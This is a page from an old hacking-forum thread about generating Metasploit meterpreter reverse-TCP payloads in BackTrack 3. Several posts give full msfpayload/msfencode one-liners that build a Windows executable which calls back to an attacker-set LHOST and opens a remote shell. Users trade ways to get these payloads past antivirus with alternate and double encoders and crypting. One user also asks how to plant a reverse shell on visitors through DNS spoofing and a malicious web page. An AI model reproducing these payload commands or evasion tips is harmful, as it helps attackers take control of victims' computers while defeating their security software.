Page 8 of 9 FirstFirst ... 6789 LastLast

Thread: Metasploiting for BT3 - Reverse TCP

Just burned his ISO

Default meterpreter, via html page

I remember seeing an article on injecting a reverse shell via html, after having spoofed the dns and redirecting the victim to my page, but i cannot find the article, does anyone know any information on this area.

Or know any techniques that can get a reverse shell after a web page is visited.

cheers

Quote Originally Posted by kazalku View Post
    Well, seems that the AV is getting smarter.
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

The above exe can no longer be used because of the AV warning. Any idea to overcome this?
    Yours is getting caught?
    I think i either did
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

or

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe >> output.exe

You could always try stopping the service whilst you create it then do some magical mystical asm XOR'ing in the right places.

Thanks for the heads up tho.

//strange, i've just updated my def's and scanned it. Mine's not getting caught at scantime OR runtime.
    I'll give it a few days then start panicing

Quote Originally Posted by kazalku View Post
    Well, seems that the AV is getting smarter.

The above exe can no longer be used because of the AV warning. Any idea to overcome this?
    I have been running into this with avast as well, tried every trick I could think of but no luck. Anyone found a way around this?

Very good friend of the forum Gitsnik's Avatar

Quote Originally Posted by rmills View Post
    I have been running into this with avast as well, tried every trick I could think of but no luck. Anyone found a way around this?
    Every trick included a different encoder or double encoding right?
    Still not underestimating the power...

There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Quote Originally Posted by Gitsnik View Post
    Every trick included a different encoder or double encoding right?
    I dont know the encoder really well but I tried the ideas I knew, a few combos of x86/fnstenv_mov, x86/jmp_call_additive and the standard x86/shikata_ga_nai. Both single and double encoding. I dont know the syntax for the manual encoders like x86/unicode_upper, maybe that would do it? Counts don't seem to matter. Also tried the basic iexpress and nullsoft with some different combo using signed files but when avast on-access scans it, game over. If you know the flags for the manual options please post.

I could also be doing the double encoding wrong, I am using it like...

Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX EXITFUNC=thread R | ./msfencode -e x86/fnstenv_mov -b '\x00\xff' -t raw | ./msfencode -b '' -t exe -o /tmp/payload.exe

Quote Originally Posted by aliosity View Post
    Yours is getting caught?
    I think i either did

or

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe >> output.exe

You could always try stopping the service whilst you create it then do some magical mystical asm XOR'ing in the right places.

Thanks for the heads up tho.

//strange, i've just updated my def's and scanned it. Mine's not getting caught at scantime OR runtime.
    I'll give it a few days then start panicing
    Both getting cought...
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

I dont know the encoder really well but I tried the ideas I knew, a few combos of x86/fnstenv_mov, x86/jmp_call_additive and the standard x86/shikata_ga_nai. Both single and double encoding. I dont know the syntax for the manual encoders like x86/unicode_upper, maybe that would do it? Counts don't seem to matter. Also tried the basic iexpress and nullsoft with some different combo using signed files but when avast on-access scans it, game over. If you know the flags for the manual options please post.

I could also be doing the double encoding wrong, I am using it like...

Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX EXITFUNC=thread R | ./msfencode -e x86/fnstenv_mov -b '\x00\xff' -t raw | ./msfencode -b '' -t exe -o /tmp/payload.exe
    This one as well....
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

First of all you dont need to triple pipe it like that, there is support in msfencode for multiple encoding, you might also want to try restricting more characters ... other than that, your best bet is to output it then crypt it with something else.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

Quote Originally Posted by vvpalin View Post
    First of all you dont need to triple pipe it like that, there is support in msfencode for multiple encoding, you might also want to try restricting more characters ... other than that, your best bet is to output it then crypt it with something else.
    Can you give an example of something else you might encrypt it with?

Can you give an example of something else you might encrypt it with?
    Google
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

Page 8 of 9 FirstFirst ... 6789 LastLast